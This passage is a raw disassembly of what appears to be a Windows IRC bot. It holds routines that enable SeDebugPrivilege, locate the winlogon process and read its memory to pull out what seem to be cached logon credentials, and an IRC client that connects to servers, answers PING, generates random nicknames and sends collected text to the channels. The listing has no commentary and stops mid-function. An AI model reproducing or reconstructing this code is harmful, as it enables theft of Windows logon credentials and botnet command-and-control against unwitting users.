pop ecx
loc_417C22: ; CODE XREF: sub_417AC3+12A�j
push 0
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
call sub_41A556
pop ecx
pop ecx
push [ebp+var_8]
call ds:dword_4F6440 ; FreeLibrary
pop ebx
jmp short loc_417C4F
; ---------------------------------------------------------------------------
loc_417C3C: ; CODE XREF: sub_417AC3+4E�j
push offset asc_44FDE8 ; "-"
loc_417C41: ; CODE XREF: sub_417AC3+3A�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_417C4F: ; CODE XREF: sub_417AC3+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_417C76
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_9C] ; int
call sub_409D6C
add esp, 14h
loc_417C76: ; CODE XREF: sub_417AC3+191�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_18]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_417AC3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417C95 proc near ; CODE XREF: sub_417AC3+AC�p
String = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_4F6450
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4F644C
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_4ED148
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F6448 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call dword_4ED148
test eax, eax
jnz short loc_417D82
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_417D82
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+String], ecx
jb short loc_417D82
loc_417D1E: ; CODE XREF: sub_417C95+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_417D75
push 0
push 0
call dword_4ED13C
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_4ED34C
test eax, eax
jnz short loc_417D66
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_417D9A
loc_417D66: ; CODE XREF: sub_417C95+AA�j
test edi, edi
jz short loc_417D71
push edi
call dword_4ED144
loc_417D71: ; CODE XREF: sub_417C95+D3�j
mov eax, [esp+28h+var_10]
loc_417D75: ; CODE XREF: sub_417C95+8E�j
add ebx, 10h
inc [esp+28h+String]
cmp [esp+28h+String], eax
jbe short loc_417D1E
loc_417D82: ; CODE XREF: sub_417C95+6D�j
; sub_417C95+7A�j ...
xor edi, edi
loc_417D84: ; CODE XREF: sub_417C95+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F6448 ; RtlFreeHeap
mov eax, edi
loc_417D92: ; CODE XREF: sub_417C95+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_417D9A: ; CODE XREF: sub_417C95+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_417E03
lea eax, [edi+80h]
mov [esp+28h+String], eax
loc_417DB0: ; CODE XREF: sub_417C95+16C�j
add [esp+28h+String], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+String] ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_417E17
push offset aMsgina ; "MSGINA"
push [esp+2Ch+String] ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_417DF5
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_417DF5: ; CODE XREF: sub_417C95+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_417DB0
loc_417E03: ; CODE XREF: sub_417C95+10F�j
test edi, edi
jz short loc_417E0E
push edi
call dword_4ED144
loc_417E0E: ; CODE XREF: sub_417C95+170�j
mov edi, [esp+28h+var_4]
jmp loc_417D84
; ---------------------------------------------------------------------------
loc_417E17: ; CODE XREF: sub_417C95+13C�j
xor eax, eax
jmp loc_417D92
sub_417C95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417E1E proc near ; CODE XREF: sub_417AC3+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call ds:dword_4F638C ; OpenProcess
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_417E47
xor eax, eax
jmp loc_417FC2
; ---------------------------------------------------------------------------
loc_417E47: ; CODE XREF: sub_417E1E+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call ds:dword_4F645C ; GetSystemInfo
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, ds:dword_4F6450
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4F644C
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, ds:dword_4F6458
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_417E97
xor esi, esi
jmp loc_417FB5
; ---------------------------------------------------------------------------
loc_417E97: ; CODE XREF: sub_417E1E+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call ds:dword_4F6454 ; VirtualQueryEx
test eax, eax
jz loc_417FA4
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_417FA4
test [ebp+var_2B], 1
jnz loc_417FA4
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_417FA4
loc_417EFA: ; CODE XREF: sub_417E1E+112�j
push edi ; Str2
push offset word_4EC13C ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jnz short loc_417F22
lea eax, [edi+200h]
push eax ; Str2
push offset word_4EC93C ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jz short loc_417F32
loc_417F22: ; CODE XREF: sub_417E1E+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_417FA4
jmp short loc_417EFA
; ---------------------------------------------------------------------------
loc_417F32: ; CODE XREF: sub_417E1E+102�j
test edi, edi
jz short loc_417FA4
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_4F641C ; FileTimeToLocalFileTime
test eax, eax
jz short loc_417F6D
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call ds:dword_4F6418 ; FileTimeToSystemTime
test eax, eax
jz short loc_417F6D
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_417F6D: ; CODE XREF: sub_417E1E+12B�j
; sub_417E1E+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov dword_4ED360, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_4ED358, eax
mov Src, edi
loc_417FA4: ; CODE XREF: sub_417E1E+90�j
; sub_417E1E+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F6448 ; RtlFreeHeap
mov esi, [ebp+var_10]
loc_417FB5: ; CODE XREF: sub_417E1E+74�j
push [ebp+var_4]
call ds:dword_4F6370 ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_417FC2: ; CODE XREF: sub_417E1E+24�j
pop esi
leave
retn
sub_417E1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417FC5 proc near ; CODE XREF: sub_417AC3:loc_417BBB�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
call ds:dword_4F638C ; OpenProcess
test eax, eax
mov [ebp+arg_0], eax
jz loc_4180B7
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call ds:dword_4F645C ; GetSystemInfo
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_4180AE
mov edi, ds:dword_4F6450
loc_418010: ; CODE XREF: sub_417FC5+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call ds:dword_4F6454 ; VirtualQueryEx
test eax, eax
jz short loc_41809C
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_4180A2
test [ebp+var_13], 1
jnz short loc_4180A2
push ecx
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_4F644C ; RtlAllocateHeap
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call ds:dword_4F6458 ; ReadProcessMemory
test eax, eax
jz short loc_41808E
push offset word_4EC13C ; Str2
push esi ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jnz short loc_41808E
lea eax, [esi+400h]
push offset word_4EC93C ; Str2
push eax ; Str1
call __wcsicmp
pop ecx
test eax, eax
pop ecx
jz short loc_4180BE
loc_41808E: ; CODE XREF: sub_417FC5+9F�j
; sub_417FC5+B0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_4F6448 ; RtlFreeHeap
jmp short loc_4180A2
; ---------------------------------------------------------------------------
loc_41809C: ; CODE XREF: sub_417FC5+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_4180A2: ; CODE XREF: sub_417FC5+71�j
; sub_417FC5+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_418010
loc_4180AE: ; CODE XREF: sub_417FC5+3F�j
push [ebp+arg_0]
call ds:dword_4F6370 ; CloseHandle
loc_4180B7: ; CODE XREF: sub_417FC5+1E�j
xor eax, eax
loc_4180B9: ; CODE XREF: sub_417FC5+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4180BE: ; CODE XREF: sub_417FC5+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_4ED358, ebx
mov Src, eax
cmp [eax], cl
jnz short loc_4180E0
cmp [eax+1], cl
jz short loc_4180E8
loc_4180E0: ; CODE XREF: sub_417FC5+114�j
; sub_417FC5+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_4180E0
loc_4180E8: ; CODE XREF: sub_417FC5+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
call ds:dword_4F6370 ; CloseHandle
push 1
pop eax
jmp short loc_4180B9
sub_417FC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4180FB proc near ; CODE XREF: sub_417AC3+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_4ED354
push esi
mov esi, ds:dword_4F6450
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_4F644C ; RtlAllocateHeap
mov ecx, dword_4ED354
mov [ebp+var_4], eax
add ecx, ecx
push ecx ; Size
push Src ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr dword_4ED360
push eax
call dword_4ED140
push [ebp+var_4]
mov edi, offset byte_4ED14C
push offset word_4EC13C
push offset word_4EC93C
push [ebp+arg_0]
push offset asc_44FE68 ; "-"
push 200h ; Count
push edi ; Dest
call __snprintf
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F6448 ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_4180FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418192 proc near ; CODE XREF: sub_417AC3:loc_417BFF�p
var_18 = word ptr -18h
var_16 = word ptr -16h
Dst = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_4ED354
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call ds:dword_4F6450 ; GetProcessHeap
push eax
call ds:dword_4F644C ; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+Dst], eax
mov ebx, offset word_4EC93C
mov edi, 200h
mov esi, offset byte_4EBF3C
loc_4181D8: ; CODE XREF: sub_418192+FA�j
mov eax, dword_4ED354
add eax, eax
push eax ; Size
push Src ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call dword_4ED140
mov eax, dword_4ED354
and [ebp+var_10], 0
mov ecx, [ebp+Dst]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_41824D
loc_418215: ; CODE XREF: sub_418192+B3�j
cmp [ebp+var_8], 0
jz short loc_41826A
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_418239
cmp byte ptr [ecx+1], 0
jnz short loc_418239
cmp dl, 20h
jnb short loc_418233
and [ebp+var_8], 0
loc_418233: ; CODE XREF: sub_418192+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_41823D
loc_418239: ; CODE XREF: sub_418192+90�j
; sub_418192+96�j
and [ebp+var_8], 0
loc_41823D: ; CODE XREF: sub_418192+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_418215
cmp [ebp+var_8], 0
jz short loc_41826A
loc_41824D: ; CODE XREF: sub_418192+81�j
push [ebp+Dst]
push offset word_4EC13C
push ebx
push [ebp+arg_0]
push offset asc_44FEB8 ; "-"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 1Ch
jmp short loc_418282
; ---------------------------------------------------------------------------
loc_41826A: ; CODE XREF: sub_418192+87�j
; sub_418192+B9�j
push offset word_4EC13C
push ebx
push [ebp+arg_0]
push offset asc_44FF08 ; "-"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 18h
loc_418282: ; CODE XREF: sub_418192+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_4181D8
push [ebp+Dst]
push 0
call ds:dword_4F6450 ; GetProcessHeap
push eax
call ds:dword_4F6448 ; RtlFreeHeap
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_418192 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182AB proc near ; CODE XREF: sub_418465+2F�p
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_4E42A0 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_418327
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_4]
call dword_4E4220 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_4E4260 ; inet_addr
cmp eax, esi
jnz short loc_41830C
push [ebp+arg_0]
call dword_4E42A4 ; gethostbyname
test eax, eax
jz short loc_418327
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_41830C: ; CODE XREF: sub_4182AB+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4E41C8 ; connect
cmp eax, esi
jnz short loc_41832B
push edi
call dword_4E42B8 ; closesocket
loc_418327: ; CODE XREF: sub_4182AB+1B�j
; sub_4182AB+58�j
mov eax, esi
jmp short loc_41832D
; ---------------------------------------------------------------------------
loc_41832B: ; CODE XREF: sub_4182AB+73�j
mov eax, edi
loc_41832D: ; CODE XREF: sub_4182AB+7E�j
pop edi
pop esi
leave
retn
sub_4182AB endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_418331(char *Dest)
sub_418331 proc near ; CODE XREF: sub_401CC7+32A7�p
; sub_401CC7+3311�p ...
Dest = dword ptr 4
push esi
push edi
mov edi, [esp+8+Dest]
push offset asc_450BD8 ; "\n"
push edi ; Dest
call _strcat
pop ecx
mov esi, offset dword_4ED36C
pop ecx
loc_418349: ; CODE XREF: sub_418331+42�j
cmp dword ptr [esi-4], 1
jnz short loc_418367
cmp dword ptr [esi], 0
jbe short loc_418367
push 0
push edi ; Str
call _strlen
pop ecx
push eax
push edi
push dword ptr [esi]
call dword_4E4270 ; send
loc_418367: ; CODE XREF: sub_418331+1C�j
; sub_418331+21�j
add esi, 210h
cmp esi, offset dword_4F3A8C
jl short loc_418349
pop edi
pop esi
retn
sub_418331 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418378(char *Str,int)
sub_418378 proc near ; CODE XREF: sub_418465+155�p
Dst = byte ptr -420h
Dest = byte ptr -220h
Str2 = dword ptr -20h
var_1C = dword ptr -1Ch
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
push edi
push offset asc_450BDC ; " "
push [ebp+Str] ; Str
call _strtok
pop ecx
mov [ebp+Str2], eax
pop ecx
lea esi, [ebp+var_1C]
push 7
xor ebx, ebx
pop edi
loc_41839E: ; CODE XREF: sub_418378+39�j
push offset asc_450BE0 ; " "
push ebx ; Str
call _strtok
mov [esi], eax
pop ecx
add esi, 4
dec edi
pop ecx
jnz short loc_41839E
cmp [ebp+Str2], ebx
mov esi, [ebp+var_1C]
jnz short loc_4183C7
cmp esi, ebx
jnz short loc_4183C7
push 1
pop eax
jmp loc_418460
; ---------------------------------------------------------------------------
loc_4183C7: ; CODE XREF: sub_418378+41�j
; sub_418378+45�j
push [ebp+Str2] ; Str2
push offset aPing_1 ; "PING"
call _strcmp
pop ecx
pop ecx
test eax, eax
push esi ; Str2
jnz short loc_4183E2
push offset aPongS_0 ; "PONG %s\n"
jmp short loc_418430
; ---------------------------------------------------------------------------
loc_4183E2: ; CODE XREF: sub_418378+61�j
push offset a433 ; "433"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_418403
push esi ; Str2
push offset a432 ; "432"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_41845E
loc_418403: ; CODE XREF: sub_418378+78�j
push 200h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418688
add esp, 10h
lea eax, [ebp+Dst]
push eax
push offset aNickS_9 ; "NICK %s\n"
loc_418430: ; CODE XREF: sub_418378+68�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
loc_41845E: ; CODE XREF: sub_418378+89�j
xor eax, eax
loc_418460: ; CODE XREF: sub_418378+4A�j
pop edi
pop esi
pop ebx
leave
retn
sub_418378 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418465 proc near ; DATA XREF: sub_41860A+61�o
Dest = byte ptr -4008h
var_3008 = byte ptr -3008h
Dst = byte ptr -2008h
Str = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call __alloca_probe
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
imul esi, 210h
push 1
pop edi
lea eax, dword_4ED374[esi]
mov dword_4ED368[esi], edi
push dword_4ED574[esi]
push eax
call sub_4182AB
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov dword_4ED36C[esi], eax
jb loc_4185EA
mov edi, 1000h
lea eax, [ebp+Dst]
push edi ; Size
push ebx ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418688
lea eax, [ebp+Dest]
push eax ; Dest
call sub_418688
lea eax, [ebp+var_3008]
push eax ; Dest
call sub_418688
add esp, 18h
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Str]
push offset aNickSUserSHotm ; "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push dword_4ED36C[esi]
call dword_4E4270 ; send
push edi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_418541: ; CODE XREF: sub_418465+111�j
; sub_418465+180�j
push edi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Str]
push ebx
push edi
push eax
push dword_4ED36C[esi]
call dword_4E4238 ; recv
cmp eax, ebx
mov [ebp+var_8], eax
jle short loc_4185EA
xor eax, eax
cmp [ebp+var_8], ebx
mov [ebp+var_4], eax
jz short loc_418541
loc_418578: ; CODE XREF: sub_418465+17E�j
mov al, [ebp+eax+Str]
cmp al, 0Dh
jz short loc_41859F
cmp al, 0Ah
jz short loc_41859F
cmp [ebp+arg_0], 0FA0h
jz short loc_41859F
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+Dst], al
jmp short loc_4185D9
; ---------------------------------------------------------------------------
loc_41859F: ; CODE XREF: sub_418465+11C�j
; sub_418465+120�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4185D9
push dword_4ED36C[esi] ; int
mov [ebp+eax+Dst], bl
lea eax, [ebp+Dst]
push eax ; Str
call sub_418378
pop ecx
test eax, eax
pop ecx
ja short loc_4185EA
push edi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_4185D9: ; CODE XREF: sub_418465+138�j
; sub_418465+13F�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
mov [ebp+var_4], eax
jnz short loc_418578
jmp loc_418541
; ---------------------------------------------------------------------------
loc_4185EA: ; CODE XREF: sub_418465+40�j
; sub_418465+107�j ...
mov dword_4ED368[esi], ebx
mov esi, dword_4ED36C[esi]
cmp esi, ebx
jbe short loc_418601
push esi
call dword_4E42B8 ; closesocket
loc_418601: ; CODE XREF: sub_418465+193�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_418465 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41860A(char *Source,int,int)
sub_41860A proc near ; CODE XREF: sub_401CC7+31F6�p
var_8 = byte ptr -8
var_4 = dword ptr -4
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
mov [ebp+var_4], ebx
jle short loc_418683
loc_41861C: ; CODE XREF: sub_41860A+77�j
xor edi, edi
mov eax, offset dword_4ED368
loc_418623: ; CODE XREF: sub_41860A+28�j
cmp [eax], ebx
jz short loc_418634
add eax, 210h
inc edi
cmp eax, offset dword_4F3A88
jl short loc_418623
loc_418634: ; CODE XREF: sub_41860A+1B�j
cmp edi, 31h
jz short loc_418683
mov esi, edi
push [ebp+Source] ; Source
imul esi, 210h
lea eax, dword_4ED374[esi]
push eax ; Dest
call _strcpy
mov eax, [ebp+arg_4]
pop ecx
mov dword_4ED574[esi], eax
pop ecx
lea eax, [ebp+var_8]
mov dword_4ED368[esi], 1
push eax
push ebx
push edi
push offset sub_418465
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_41861C
loc_418683: ; CODE XREF: sub_41860A+10�j
; sub_41860A+2D�j
pop edi
pop esi
pop ebx
leave
retn
sub_41860A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418688(char *Dest)
sub_418688 proc near ; CODE XREF: sub_401CC7+3758�p
; sub_401CC7+37A2�p ...
Source = byte ptr -40h
var_2D = byte ptr -2Dh
Dst = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_18 = qword ptr -18h
Count = dword ptr -0Ch
var_4 = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push 14h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
call _rand
mov [ebp+Count], eax
fild [ebp+Count]
fmul ds:dbl_43D4D0
call __ftol
cmp eax, 1
jnz short loc_4186D2
call _rand
call _rand
push 66h
cdq
pop ecx
idiv ecx
push off_45025C[edx*4]
jmp short loc_4186EB
; ---------------------------------------------------------------------------
loc_4186D2: ; CODE XREF: sub_418688+2F�j
call _rand
call _rand
cdq
mov ecx, 0C0h
idiv ecx
push off_44FF5C[edx*4] ; Source
loc_4186EB: ; CODE XREF: sub_418688+48�j
lea eax, [ebp+Dst]
push eax ; Dest
call _strcpy
pop ecx
lea eax, [ebp+Dst]
pop ecx
push ebx
push esi
push edi
push eax ; Str
call _strlen
pop ecx
mov esi, eax
push 13h
mov [ebp+var_4], esi
pop eax
sub eax, esi
mov [ebp+Count], eax
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D4C8
call __ftol
mov ebx, eax
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul ds:dbl_43D4C0
call __ftol
cmp esi, 2
mov edi, offset a__3 ; "-|`_\\{[]}"
jle short loc_41875E
cmp esi, 3
jnz short loc_418755
cmp ebx, 1
jz short loc_41875E
loc_418755: ; CODE XREF: sub_418688+C6�j
cmp eax, 1
jnz loc_418818
loc_41875E: ; CODE XREF: sub_418688+C1�j
; sub_418688+CB�j
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43D4B8
call __ftol
push off_45025C[eax*4] ; Source
lea eax, [ebp+Source]
push eax ; Dest
call _strcpy
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+Dst]
push eax ; Val
push edi ; Str
call _strchr
add esp, 10h
test eax, eax
jnz short loc_418805
movsx eax, [ebp+Source]
push eax ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz short loc_418805
call _rand
mov dword ptr [ebp+var_18+4], eax
dec esi
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], esi
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_43D4C0
call __ftol
cmp eax, 1
jnz short loc_418805
push edi ; Str
call _strlen
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-8]
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-8]
fmul ds:dbl_43D4C0
call __ftol
